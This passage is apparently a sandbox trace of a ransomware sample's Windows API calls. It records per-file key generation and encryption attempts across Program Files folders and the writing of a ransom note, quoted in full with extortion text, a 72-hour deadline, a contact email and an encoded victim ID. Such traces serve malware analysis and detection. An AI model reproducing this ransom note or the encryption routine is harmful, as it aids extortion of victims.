dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e858*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e858*=0x30) returned 1 [0161.456] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg_sml.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg_sml.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.463] GetProcessHeap () returned 0x2c0000 [0161.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.463] GetProcessHeap () returned 0x2c0000 [0161.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87718 | out: hHeap=0x2c0000) returned 1 [0161.463] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e860 | out: pbBuffer=0x57e860) returned 1 [0161.463] GetProcessHeap () returned 0x2c0000 [0161.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.463] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e858*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e858*=0x30) returned 1 [0161.463] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.529] GetProcessHeap () returned 0x2c0000 [0161.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.529] GetProcessHeap () returned 0x2c0000 [0161.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eec428 | out: hHeap=0x2c0000) returned 1 [0161.529] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e858 | out: pbBuffer=0x57e858) returned 1 [0161.529] GetProcessHeap () returned 0x2c0000 [0161.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.529] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57e850*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57e850*=0x30) returned 1 [0161.529] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\gadget.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.549] GetProcessHeap () returned 0x2c0000 [0161.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.549] GetProcessHeap () returned 0x2c0000 [0161.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eec170 | out: hHeap=0x2c0000) returned 1 [0161.549] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.706] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.706] WriteFile (in: hFile=0x178, lpBuffer=0x57e78b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e8b4, lpOverlapped=0x0 | out: lpBuffer=0x57e78b*, lpNumberOfBytesWritten=0x57e8b4*=0x127, lpOverlapped=0x0) returned 1 [0161.707] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.708] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e8b4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e8b4*=0x2ac, lpOverlapped=0x0) returned 1 [0161.708] CloseHandle (hObject=0x178) returned 1 [0161.708] GetProcessHeap () returned 0x2c0000 [0161.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87338 | out: hHeap=0x2c0000) returned 1 [0161.708] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e850 | out: pbBuffer=0x57e850) returned 1 [0161.708] GetProcessHeap () returned 0x2c0000 [0161.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.708] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e848*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e848*=0x30) returned 1 [0161.708] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_s.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.739] GetProcessHeap () returned 0x2c0000 [0161.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.742] GetProcessHeap () returned 0x2c0000 [0161.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1530 | out: hHeap=0x2c0000) returned 1 [0161.742] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e850 | out: pbBuffer=0x57e850) returned 1 [0161.742] GetProcessHeap () returned 0x2c0000 [0161.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.742] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e848*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e848*=0x30) returned 1 [0161.742] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_m.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.765] GetProcessHeap () returned 0x2c0000 [0161.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.766] GetProcessHeap () returned 0x2c0000 [0161.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1080 | out: hHeap=0x2c0000) returned 1 [0161.766] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e848 | out: pbBuffer=0x57e848) returned 1 [0161.766] GetProcessHeap () returned 0x2c0000 [0161.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.766] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e840*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e840*=0x30) returned 1 [0161.766] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_s.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.830] GetProcessHeap () returned 0x2c0000 [0161.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.830] GetProcessHeap () returned 0x2c0000 [0161.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87050 | out: hHeap=0x2c0000) returned 1 [0161.830] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e848 | out: pbBuffer=0x57e848) returned 1 [0161.830] GetProcessHeap () returned 0x2c0000 [0161.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.830] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e840*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e840*=0x30) returned 1 [0161.830] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.845] GetProcessHeap () returned 0x2c0000 [0161.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.846] GetProcessHeap () returned 0x2c0000 [0161.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0db0 | out: hHeap=0x2c0000) returned 1 [0161.847] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e840 | out: pbBuffer=0x57e840) returned 1 [0161.847] GetProcessHeap () returned 0x2c0000 [0161.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.847] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e838*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e838*=0x30) returned 1 [0161.864] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_h.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.867] GetProcessHeap () returned 0x2c0000 [0161.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.868] GetProcessHeap () returned 0x2c0000 [0161.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0ae0 | out: hHeap=0x2c0000) returned 1 [0161.868] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e840 | out: pbBuffer=0x57e840) returned 1 [0161.868] GetProcessHeap () returned 0x2c0000 [0161.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.868] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e838*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e838*=0x30) returned 1 [0161.868] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_settings.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.874] GetProcessHeap () returned 0x2c0000 [0161.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.876] GetProcessHeap () returned 0x2c0000 [0161.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eab688 | out: hHeap=0x2c0000) returned 1 [0161.876] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e838 | out: pbBuffer=0x57e838) returned 1 [0161.876] GetProcessHeap () returned 0x2c0000 [0161.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.876] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e830*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e830*=0x30) returned 1 [0161.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\settings.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.889] GetProcessHeap () returned 0x2c0000 [0161.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.889] GetProcessHeap () returned 0x2c0000 [0161.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0180 | out: hHeap=0x2c0000) returned 1 [0161.889] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e838 | out: pbBuffer=0x57e838) returned 1 [0161.889] GetProcessHeap () returned 0x2c0000 [0161.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.889] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e830*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e830*=0x30) returned 1 [0161.889] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\clock.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.901] GetProcessHeap () returned 0x2c0000 [0161.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.901] GetProcessHeap () returned 0x2c0000 [0161.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0090 | out: hHeap=0x2c0000) returned 1 [0161.901] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e830 | out: pbBuffer=0x57e830) returned 1 [0161.901] GetProcessHeap () returned 0x2c0000 [0161.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.901] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e828*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e828*=0x30) returned 1 [0161.901] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-dock.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\rings-dock.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.923] GetProcessHeap () returned 0x2c0000 [0161.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.923] GetProcessHeap () returned 0x2c0000 [0161.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaedb8 | out: hHeap=0x2c0000) returned 1 [0161.923] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e830 | out: pbBuffer=0x57e830) returned 1 [0161.923] GetProcessHeap () returned 0x2c0000 [0161.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.923] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e828*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e828*=0x30) returned 1 [0161.923] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\curl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.969] GetProcessHeap () returned 0x2c0000 [0161.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.970] GetProcessHeap () returned 0x2c0000 [0161.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecfaf0 | out: hHeap=0x2c0000) returned 1 [0161.970] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e828 | out: pbBuffer=0x57e828) returned 1 [0161.970] GetProcessHeap () returned 0x2c0000 [0161.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.970] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e820*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e820*=0x30) returned 1 [0161.970] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg_orange.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_bkg_orange.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.028] GetProcessHeap () returned 0x2c0000 [0162.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.057] GetProcessHeap () returned 0x2c0000 [0162.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c82540 | out: hHeap=0x2c0000) returned 1 [0162.057] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e828 | out: pbBuffer=0x57e828) returned 1 [0162.057] GetProcessHeap () returned 0x2c0000 [0162.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.057] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e820*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e820*=0x30) returned 1 [0162.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_orange.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.073] GetProcessHeap () returned 0x2c0000 [0162.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.073] GetProcessHeap () returned 0x2c0000 [0162.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb6360 | out: hHeap=0x2c0000) returned 1 [0162.073] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e820 | out: pbBuffer=0x57e820) returned 1 [0162.073] GetProcessHeap () returned 0x2c0000 [0162.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.073] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e818*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e818*=0x30) returned 1 [0162.073] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.076] GetProcessHeap () returned 0x2c0000 [0162.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.076] GetProcessHeap () returned 0x2c0000 [0162.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecb710 | out: hHeap=0x2c0000) returned 1 [0162.076] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e820 | out: pbBuffer=0x57e820) returned 1 [0162.076] GetProcessHeap () returned 0x2c0000 [0162.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.076] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e818*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e818*=0x30) returned 1 [0162.076] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\calendar.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\calendar.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.261] GetProcessHeap () returned 0x2c0000 [0162.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.261] GetProcessHeap () returned 0x2c0000 [0162.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecb618 | out: hHeap=0x2c0000) returned 1 [0162.261] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e818 | out: pbBuffer=0x57e818) returned 1 [0162.261] GetProcessHeap () returned 0x2c0000 [0162.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.261] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e810*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e810*=0x30) returned 1 [0162.262] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoviewer.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.268] GetProcessHeap () returned 0x2c0000 [0162.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.268] GetProcessHeap () returned 0x2c0000 [0162.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2398 | out: hHeap=0x2c0000) returned 1 [0162.268] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e818 | out: pbBuffer=0x57e818) returned 1 [0162.268] GetProcessHeap () returned 0x2c0000 [0162.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.268] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e810*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e810*=0x30) returned 1 [0162.268] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedZhengMa.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedzhengma.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.274] GetProcessHeap () returned 0x2c0000 [0162.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.274] GetProcessHeap () returned 0x2c0000 [0162.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eab160 | out: hHeap=0x2c0000) returned 1 [0162.274] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e810 | out: pbBuffer=0x57e810) returned 1 [0162.274] GetProcessHeap () returned 0x2c0000 [0162.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.274] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57e808*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57e808*=0x30) returned 1 [0162.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceDaYi.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicedayi.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff 